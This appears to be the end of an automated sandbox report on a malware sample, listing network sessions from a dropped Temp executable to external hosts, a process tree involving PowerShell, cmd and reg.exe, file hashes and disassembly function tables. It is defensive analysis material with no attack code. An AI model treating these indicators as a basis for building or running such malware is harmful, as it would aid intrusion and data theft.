Jul 25, 2024 09:56:43.313987970 CEST | 151 | OUT | |
Jul 25, 2024 09:56:44.039083958 CEST | 320 | IN | |
Jul 25, 2024 09:56:44.043277025 CEST | 127 | OUT | |
Jul 25, 2024 09:56:44.221239090 CEST | 320 | IN | |
Jul 25, 2024 09:56:45.821000099 CEST | 127 | OUT | |
Jul 25, 2024 09:56:47.189729929 CEST | 320 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.4 | 49740 | 158.101.44.242 | 80 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Jul 25, 2024 09:56:47.807820082 CEST | 127 | OUT | |
Jul 25, 2024 09:56:49.885149002 CEST | 320 | IN | |
Jul 25, 2024 09:56:49.886353970 CEST | 320 | IN | |
Jul 25, 2024 09:56:50.421607971 CEST | 320 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.4 | 49743 | 158.101.44.242 | 80 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Jul 25, 2024 09:56:51.110867023 CEST | 151 | OUT | |
Jul 25, 2024 09:56:52.869508028 CEST | 320 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.4 | 49745 | 158.101.44.242 | 80 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Jul 25, 2024 09:56:53.599736929 CEST | 151 | OUT | |
Jul 25, 2024 09:56:55.177944899 CEST | 320 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.4 | 49747 | 158.101.44.242 | 80 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Jul 25, 2024 09:56:55.810894012 CEST | 151 | OUT | |
Jul 25, 2024 09:56:57.163333893 CEST | 320 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.4 | 49749 | 158.101.44.242 | 80 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Jul 25, 2024 09:56:57.777391911 CEST | 151 | OUT | |
Jul 25, 2024 09:56:58.525434971 CEST | 320 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.4 | 49751 | 158.101.44.242 | 80 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Jul 25, 2024 09:56:59.177807093 CEST | 151 | OUT | |
Jul 25, 2024 09:57:00.643740892 CEST | 320 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49736 | 185.98.5.168 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-07-25 07:56:41 UTC | 182 | OUT | |
2024-07-25 07:56:41 UTC | 341 | IN | |
2024-07-25 07:56:41 UTC | 16043 | IN | |
2024-07-25 07:56:41 UTC | 16384 | IN | |
2024-07-25 07:56:42 UTC | 16384 | IN | |
2024-07-25 07:56:42 UTC | 16384 | IN | |
2024-07-25 07:56:42 UTC | 16384 | IN | |
2024-07-25 07:56:42 UTC | 16384 | IN | |
2024-07-25 07:56:42 UTC | 16384 | IN | |
2024-07-25 07:56:42 UTC | 16384 | IN | |
2024-07-25 07:56:42 UTC | 2965 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.4 | 49738 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-07-25 07:56:45 UTC | 84 | OUT | |
2024-07-25 07:56:45 UTC | 706 | IN | |
2024-07-25 07:56:45 UTC | 340 | IN | |
2024-07-25 07:56:45 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.4 | 49739 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-07-25 07:56:47 UTC | 60 | OUT | |
2024-07-25 07:56:47 UTC | 710 | IN | |
2024-07-25 07:56:47 UTC | 340 | IN | |
2024-07-25 07:56:47 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.4 | 49741 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-07-25 07:56:50 UTC | 84 | OUT | |
2024-07-25 07:56:51 UTC | 704 | IN | |
2024-07-25 07:56:51 UTC | 340 | IN | |
2024-07-25 07:56:51 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.4 | 49744 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-07-25 07:56:53 UTC | 60 | OUT | |
2024-07-25 07:56:53 UTC | 706 | IN | |
2024-07-25 07:56:53 UTC | 340 | IN | |
2024-07-25 07:56:53 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.4 | 49746 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-07-25 07:56:55 UTC | 60 | OUT | |
2024-07-25 07:56:55 UTC | 708 | IN | |
2024-07-25 07:56:55 UTC | 340 | IN | |
2024-07-25 07:56:55 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.4 | 49748 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-07-25 07:56:57 UTC | 84 | OUT | |
2024-07-25 07:56:57 UTC | 716 | IN | |
2024-07-25 07:56:57 UTC | 340 | IN | |
2024-07-25 07:56:57 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.4 | 49750 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-07-25 07:56:59 UTC | 84 | OUT | |
2024-07-25 07:56:59 UTC | 706 | IN | |
2024-07-25 07:56:59 UTC | 340 | IN | |
2024-07-25 07:56:59 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.4 | 49752 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-07-25 07:57:01 UTC | 84 | OUT | |
2024-07-25 07:57:01 UTC | 710 | IN | |
2024-07-25 07:57:01 UTC | 340 | IN | |
2024-07-25 07:57:01 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.4 | 49753 | 149.154.167.220 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-07-25 07:57:07 UTC | 350 | OUT | |
2024-07-25 07:57:07 UTC | 547 | OUT | |
2024-07-25 07:57:07 UTC | 388 | IN | |
2024-07-25 07:57:07 UTC | 537 | IN |
Target ID: | 0 |
Start time: | 03:55:52 |
Start date: | 25/07/2024 |
Path: | C:\Users\user\Desktop\Torpernes.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 1'283'968 bytes |
MD5 hash: | ECC4FF0EE7D123F0E90587EA3A7B9AE3 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 1 |
Start time: | 03:55:54 |
Start date: | 25/07/2024 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xc90000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: | |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 03:55:54 |
Start date: | 25/07/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 03:56:31 |
Start date: | 25/07/2024 |
Path: | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 1'283'968 bytes |
MD5 hash: | ECC4FF0EE7D123F0E90587EA3A7B9AE3 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: | |
Antivirus matches: | |
Reputation: | low |
Has exited: | false |
Target ID: | 7 |
Start time: | 03:56:35 |
Start date: | 25/07/2024 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x240000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 03:56:35 |
Start date: | 25/07/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 9 |
Start time: | 03:56:35 |
Start date: | 25/07/2024 |
Path: | C:\Windows\SysWOW64\reg.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xce0000 |
File size: | 59'392 bytes |
MD5 hash: | CDD462E86EC0F20DE2A1D781928B1B0C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Execution Graph
Execution Coverage: | 20.1% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 22.5% |
Total number of Nodes: | 1256 |
Total number of Limit Nodes: | 36 |
Graph
Function | Relevance | APIs | Strings | Instructions | Tags |
---|---|---|---|---|---|
004031FF | 77.4 | 27 | 17 | 383 | string, file, com, COMMON |
00405200 | 65.0 | 36 | 1 | 284 | window, clipboard, memory, COMMON |
00405E3B | 23.0 | 8 | 5 | 207 | string, COMMON |
004056A1 | 17.6 | 7 | 3 | 148 | file, string, COMMON |
0040646E | 5.4 | 4 | | 382 | COMMON |
0040615C | 3.0 | 2 | | 14 | file, COMMON |
004037AC | 49.2 | 15 | 13 | 216 | string, registry, library, COMMON |
00402FA2 | 14.2 | 6 | 2 | 166 | file, COMMON |
00401752 | 14.1 | 5 | 3 | 145 | string, time, COMMON |
004050C1 | 14.1 | 7 | 1 | 72 | string, window, COMMON |
00405590 | 5.3 | 2 | 1 | 24 | process, COMMON |
004068A3 | 5.2 | 4 | | 236 | COMMON |
00406AA4 | 5.2 | 4 | | 208 | COMMON |
004067BA | 5.2 | 4 | | 205 | COMMON |
004062BF | 5.2 | 4 | | 198 | COMMON |
0040670D | 5.2 | 4 | | 180 | COMMON |
0040682B | 5.2 | 4 | | 170 | COMMON |
00406777 | 5.2 | 4 | | 168 | COMMON |
00401389 | 3.0 | 2 | | 43 | window, COMMON |
00401DC7 | 3.0 | 2 | | 21 | COMMON |
00405A85 | 3.0 | 2 | | 16 | file, COMMON |
00405A60 | 3.0 | 2 | | 13 | COMMON |
00401718 | 1.5 | 1 | | 24 | COMMON |
00405B08 | 1.5 | 1 | | 22 | file, COMMON |
0040159B | 1.5 | 1 | | 18 | COMMON |
00404073 | 1.5 | 1 | | 9 | window, COMMON |
0040405C | 1.5 | 1 | | 6 | window, COMMON |
004031B4 | 1.5 | 1 | | 6 | COMMON |
00404049 | 1.5 | 1 | | 4 | COMMON |
00404A3D | 63.5 | 33 | 3 | 481 | window, memory, COMMON |
004044C2 | 24.8 | 10 | 4 | 275 | string, COMMON |
00402770 | 1.5 | 1 | | 30 | file, COMMON |
004041C4 | 40.5 | 20 | 3 | 207 | window, string, COMMON |
00405B37 | 29.9 | 12 | 5 | 136 | string, memory, file, COMMON |
0040408E | 12.1 | 8 | | 61 | COMMON |
004024EE | 10.6 | 4 | 2 | 54 | file, string, COMMON |
0040498B | 10.5 | 5 | 1 | 48 | window, COMMON |
00402C7F | 10.5 | 5 | 1 | 40 | time, COMMON |
00401CE5 | 7.5 | 5 | | 39 | window, COMMON |
0040487D | 7.1 | 3 | 1 | 84 | string, COMMON |
00401BCA | 7.1 | 3 | 1 | 76 | window, time, COMMON |
00405CE6 | 7.0 | 3 | 1 | 45 | registry, COMMON |
00405864 | 7.0 | 3 | 1 | 16 | string, COMMON |
00401F08 | 6.1 | 4 | | 55 | memory, COMMON |
00402D05 | 6.0 | 4 | | 33 | COMMON |
00405035 | 5.3 | 2 | 1 | 46 | window, COMMON |
004058B0 | 5.3 | 2 | 1 | 16 | string, COMMON |
004059EA | 5.0 | 4 | | 37 | string, COMMON |
0457EAD8 | 0.3 | | | 281 | COMMON |
0457F3A8 | 0.3 | | | 266 | COMMON |
070A48D0 | 31.1 | | 24 | 1118 | COMMON |
070A70A5 | 12.9 | | 10 | 400 | COMMON |
070ABCFF | 12.2 | | 9 | 994 | COMMON |
070AFB6B | 9.1 | | 7 | 318 | COMMON |
070A3178 | 7.9 | | 6 | 373 | COMMON |
070A0778 | 6.5 | | 5 | 230 | COMMON |
070A386D | 5.7 | | 4 | 660 | COMMON |
070A9110 | 5.6 | | 4 | 588 | COMMON |
070A3176 | 5.3 | | 4 | 290 | COMMON |
070A4262 | 4.4 | | 3 | 644 | COMMON |
070A37CE | 4.4 | | 3 | 631 | COMMON |
070AC54B | 4.4 | | 3 | 621 | COMMON |
0457AFE8 | 4.3 | | 3 | 521 | COMMON |
070AC632 | 4.2 | | 3 | 468 | COMMON |
070AC6D1 | 4.2 | | 3 | 425 | COMMON |
070AC6BB | 4.1 | | 3 | 331 | COMMON |
070A1040 | 3.0 | | 2 | 493 | COMMON |
070A3618 | 1.4 | | 1 | 102 | COMMON |
045795A8 | 0.3 | | | 327 | COMMON |
045772A0 | 0.3 | | | 317 | COMMON |
0457EACD | 0.3 | | | 280 | COMMON |
0457F39C | 0.3 | | | 264 | COMMON |
070A5A88 | 0.2 | | | 239 | COMMON |
04577A68 | 0.2 | | | 196 | COMMON |
070A4610 | 0.2 | | | 192 | COMMON |
04577BD6 | 0.2 | | | 188 | COMMON |
070A460A | 0.2 | | | 176 | COMMON |
045777F9 | 0.1 | | | 127 | COMMON |
070A90F5 | 0.1 | | | 123 | COMMON |
04577A53 | 0.1 | | | 120 | COMMON |
04572BB0 | 0.1 | | | 110 | COMMON |
|
Similarity |
|
Function 070A0DE8 Relevance: .1, Instructions: 94COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0457BCA0 Relevance: .1, Instructions: 92COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A5A69 Relevance: .1, Instructions: 87COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A5A30 Relevance: .1, Instructions: 84COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A0DCD Relevance: .1, Instructions: 79COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A5A49 Relevance: .1, Instructions: 74COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04579597 Relevance: .1, Instructions: 64COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A0BD8 Relevance: .1, Instructions: 52COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A17F7 Relevance: .0, Instructions: 6COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A8778 Relevance: 14.2, Strings: 11, Instructions: 496COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AD0B8 Relevance: 14.1, Strings: 11, Instructions: 367COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A7738 Relevance: 11.7, Strings: 9, Instructions: 419COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AE1D4 Relevance: 8.9, Strings: 7, Instructions: 160COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070ADC79 Relevance: 7.7, Strings: 6, Instructions: 168COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A0285 Relevance: 7.6, Strings: 6, Instructions: 79COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AEBDC Relevance: 6.4, Strings: 5, Instructions: 194COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AEBF0 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A0470 Relevance: 6.4, Strings: 5, Instructions: 148COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070ADDBE Relevance: 6.3, Strings: 5, Instructions: 85COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AA470 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AD588 Relevance: 5.5, Strings: 4, Instructions: 482COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AEFB8 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AA800 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A771D Relevance: 5.1, Strings: 4, Instructions: 82COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AA7E1 Relevance: 5.1, Strings: 4, Instructions: 80COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Execution Graph
Execution Coverage: | 14.1% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 7.6% |
Total number of Nodes: | 92 |
Total number of Limit Nodes: | 6 |
Function 00156730 Relevance: 6.7, Strings: 5, Instructions: 467, Tags: COMMON
Function 20CB3288 Relevance: 4.3, Strings: 1, Instructions: 3069, Tags: COMMON
Function 00159858 Relevance: 3.4, Strings: 2, Instructions: 860, Tags: COMMON
Function 00156108 Relevance: 3.0, Strings: 2, Instructions: 513, Tags: COMMON
Function 0015B328 Relevance: 2.9, Strings: 2, Instructions: 356, Tags: COMMON
Function 0015BBBA Relevance: 2.7, Strings: 2, Instructions: 202, Tags: COMMON
Function 0015C754 Relevance: 2.7, Strings: 2, Instructions: 192, Tags: COMMON
Function 00154AD9 Relevance: 2.7, Strings: 2, Instructions: 188, Tags: COMMON
Function 0015C473 Relevance: 2.7, Strings: 2, Instructions: 186, Tags: COMMON
Function 0015CA34 Relevance: 2.7, Strings: 2, Instructions: 186, Tags: COMMON
Function 0015C190 Relevance: 2.7, Strings: 2, Instructions: 185, Tags: COMMON
Function 0015BEB7 Relevance: 2.7, Strings: 2, Instructions: 181, Tags: COMMON
Function 20CB7588 Relevance: .5, Instructions: 531, Tags: COMMON
Function 238285B0 Relevance: .3, Instructions: 296, Tags: COMMON
Function 0015F778 Relevance: .3, Instructions: 292, Tags: COMMON
Function 20CB0D60 Relevance: .3, Instructions: 268, Tags: COMMON
Function 23820498 Relevance: .3, Instructions: 268, Tags: COMMON
Function 20CB11B0 Relevance: .2, Instructions: 222, Tags: COMMON
Function 20CB11C0 Relevance: .2, Instructions: 220, Tags: COMMON
Function 20CB1506 Relevance: .2, Instructions: 202, Tags: COMMON
Function 20CB0D50 Relevance: .1, Instructions: 102, Tags: COMMON
Function 20424F6F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128, Tags: thread, COMMON
Function 20424F70 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128, Tags: thread, COMMON
Function 00156E58 Relevance: 10.5, Strings: 8, Instructions: 475, Tags: COMMON
Function 20CB1CB0 Relevance: 5.2, Strings: 4, Instructions: 229, Tags: COMMON
Function 001587E9 Relevance: 4.3, Strings: 3, Instructions: 503, Tags: COMMON
Function 001577F0 Relevance: 3.2, Strings: 2, Instructions: 702, Tags: COMMON
Function 001556A8 Relevance: 2.8, Strings: 2, Instructions: 326, Tags: COMMON
Function 00155C08 Relevance: 2.7, Strings: 2, Instructions: 232, Tags: COMMON
Function 20CB24D8 Relevance: 2.7, Strings: 2, Instructions: 167, Tags: COMMON
Function 00153428 Relevance: 2.6, Strings: 2, Instructions: 112, Tags: COMMON
Function 20CB25B1 Relevance: 2.6, Strings: 2, Instructions: 101, Tags: COMMON
Function 20CB25E5 Relevance: 2.6, Strings: 2, Instructions: 100, Tags: COMMON
Function 00150C8F Relevance: 1.7, Strings: 1, Instructions: 406, Tags: COMMON
Function 00150CA0 Relevance: 1.6, Strings: 1, Instructions: 395, Tags: COMMON
Function 2042FA50 Relevance: 1.6, APIs: 1, Instructions: 113, Tags: COMMON
Function 205122F0 Relevance: 1.6, APIs: 1, Instructions: 93, Tags: COMMON
Function 204251B1 Relevance: 1.6, APIs: 1, Instructions: 63, Tags: COMMON
Function 204251B8 Relevance: 1.6, APIs: 1, Instructions: 62, Tags: COMMON
Function 20514830 Relevance: 1.5, APIs: 1, Instructions: 48, Tags: com, COMMON
Function 205139D0 Relevance: 1.5, APIs: 1, Instructions: 46, Tags: com, COMMON
Function 20CBFD30 Relevance: 1.4, Strings: 1, Instructions: 148, Tags: COMMON
Function 0015A650 Relevance: 1.4, Strings: 1, Instructions: 125, Tags: COMMON
Function 20CB29F0 Relevance: 1.4, Strings: 1, Instructions: 122, Tags: COMMON
Function 20CB2B30 Relevance: 1.3, Strings: 1, Instructions: 91, Tags: COMMON
Function 00151F61 Relevance: 1.3, Strings: 1, Instructions: 56, Tags: COMMON
Function 0015A818 Relevance: .4, Instructions: 414, Tags: COMMON
Function 00157438 Relevance: .2, Instructions: 201, Tags: COMMON
Function 20CB2CC7 Relevance: .2, Instructions: 175, Tags: COMMON
Function 0015CEC7 Relevance: .2, Instructions: 173, Tags: COMMON
Function 0015CED8 Relevance: .2, Instructions: 167, Tags: COMMON
Function 0015D59F Relevance: .2, Instructions: 154, Tags: COMMON
Function 0015CD10 Relevance: .1, Instructions: 140, Tags: COMMON
Function 00153908 Relevance: .1, Instructions: 134, Tags: COMMON
Function 00159A63 Relevance: .1, Instructions: 127, Tags: COMMON
Function 00154DC8 Relevance: .1, Instructions: 101, Tags: COMMON
Function 001576D0 Relevance: .1, Instructions: 90, Tags: COMMON
Function 0015A809 Relevance: .1, Instructions: 90, Tags: COMMON
Function 001576E0 Relevance: .1, Instructions: 87, Tags: COMMON
Function 00155A68 Relevance: .1, Instructions: 79, Tags: COMMON
Function 00152060 Relevance: .1, Instructions: 77, Tags: COMMON
Function 000AD044 Relevance: .1, Instructions: 72, Tags: COMMON
Function 0015215C Relevance: .1, Instructions: 69, Tags: COMMON
Function 001539ED Relevance: .1, Instructions: 68, Tags: COMMON
Function 00154DC5 Relevance: .1, Instructions: 64, Tags: COMMON
Function 20CB2898 Relevance: .1, Instructions: 64, Tags: COMMON
Function 0015D4C0 Relevance: .1, Instructions: 63, Tags: COMMON
Function 20CB7B8C Relevance: .1, Instructions: 62, Tags: COMMON
Function 00155A70 Relevance: .1, Instructions: 59, Tags: COMMON
Function 20CB2E60 Relevance: .1, Instructions: 57, Tags: COMMON
Function 0015D4D0 Relevance: .1, Instructions: 54, Tags: COMMON
Function 000AD03F Relevance: .1, Instructions: 53, Tags: COMMON
Function 00151F08 Relevance: .1, Instructions: 53, Tags: COMMON
Function 00155607 Relevance: .1, Instructions: 51, Tags: COMMON
Function 20CB2C40 Relevance: .1, Instructions: 51, Tags: COMMON
Function 20CB28A0 Relevance: .0, Instructions: 46, Tags: COMMON
Function 20CB1650 Relevance: .0, Instructions: 46, Tags: COMMON
Function 20CB1641 Relevance: .0, Instructions: 44, Tags: COMMON
Function 0015F688 Relevance: .0, Instructions: 43, Tags: COMMON
Function 0015F698 Relevance: .0, Instructions: 37, Tags: COMMON
Function 20CB2F05 Relevance: .0, Instructions: 37, Tags: COMMON
Function 20CB2734 Relevance: .0, Instructions: 35, Tags: COMMON
Function 20CB2BF0 Relevance: .0, Instructions: 33, Tags: COMMON
Function 00152010 Relevance: .0, Instructions: 27, Tags: COMMON
Function 0015F586 Relevance: .0, Instructions: 27, Tags: COMMON
Function 20CB24D4 Relevance: .0, Instructions: 26, Tags: COMMON
Function 0015F639 Relevance: .0, Instructions: 23, Tags: COMMON
Function 0015F598 Relevance: .0, Instructions: 21, Tags: COMMON
Function 00152020 Relevance: .0, Instructions: 19, Tags: COMMON
Function 00158258 Relevance: .0, Instructions: 18, Tags: COMMON
Function 20CB2CA0 Relevance: .0, Instructions: 17, Tags: COMMON
Function 0015A70D Relevance: .0, Instructions: 16, Tags: COMMON
Function 00155EA8 Relevance: .0, Instructions: 16, Tags: COMMON
Function 0015F014 Relevance: .0, Instructions: 15, Tags: COMMON
Function 00155EB8 Relevance: .0, Instructions: 12, Tags: COMMON
Function 00404A3D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481, Tags: window, memory, COMMON
Function 004031FF Relevance: 61.6, APIs: 27, Strings: 8, Instructions: 383, Tags: string, file, com, COMMON
Function 004056A1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148, Tags: file, string, COMMON
Function 0040646E Relevance: 5.4, APIs: 4, Instructions: 382, Tags: COMMON
Function 0015D7F0 Relevance: 1.8, Strings: 1, Instructions: 596, Tags: COMMON
Function 0015E431 Relevance: .7, Instructions: 716, Tags: COMMON
Function 20CBF8D8 Relevance: .3, Instructions: 268, Tags: COMMON
Function 20CBF480 Relevance: .3, Instructions: 268, Tags: COMMON
Function 20CB04A0 Relevance: .3, Instructions: 268, Tags: COMMON
Function 20CBC4B8 Relevance: .3, Instructions: 268, Tags: COMMON
Function 20CB0040 Relevance: .3, Instructions: 268, Tags: COMMON
Function 20CBC060 Relevance: .3, Instructions: 268, Tags: COMMON
Function 20CBBC08 Relevance: .3, Instructions: 268, Tags: COMMON
Function 20CBF028 Relevance: .3, Instructions: 268, Tags: COMMON
Function 20CBD1C0 Relevance: .3, Instructions: 268, Tags: COMMON
Function 20CBCD68 Relevance: .3, Instructions: 268, Tags: COMMON
Function 20CB0900 Relevance: .3, Instructions: 268, Tags: COMMON
Function 20CBC910 Relevance: .3, Instructions: 268, Tags: COMMON
Function 20CBDEC8 Relevance: .3, Instructions: 268, Tags: COMMON
Function 20CBDA70 Relevance: .3, Instructions: 268, Tags: COMMON
Function 20CBD618 Relevance: .3, Instructions: 268, Tags: COMMON
Function 20CBEBD0 Relevance: .3, Instructions: 268, Tags: COMMON
Function 20CBB7B0 Relevance: .3, Instructions: 268, Tags: COMMON
Function 20CBB358 Relevance: .3, Instructions: 268, Tags: COMMON
Function 20CBE778 Relevance: .3, Instructions: 268, Tags: COMMON
Function 20CBAF00 Relevance: .3, Instructions: 268, Tags: COMMON
Function 20CBE320 Relevance: .3, Instructions: 268, Tags: COMMON
Function 238255C0 Relevance: .3, Instructions: 268, Tags: COMMON
Function 23826FF8 Relevance: .3, Instructions: 268, Tags: COMMON
Function 23827D00 Relevance: .3, Instructions: 268, Tags: COMMON
Function 23826720 Relevance: .3, Instructions: 268, Tags: COMMON
Function 23825140 Relevance: .3, Instructions: 268, Tags: COMMON
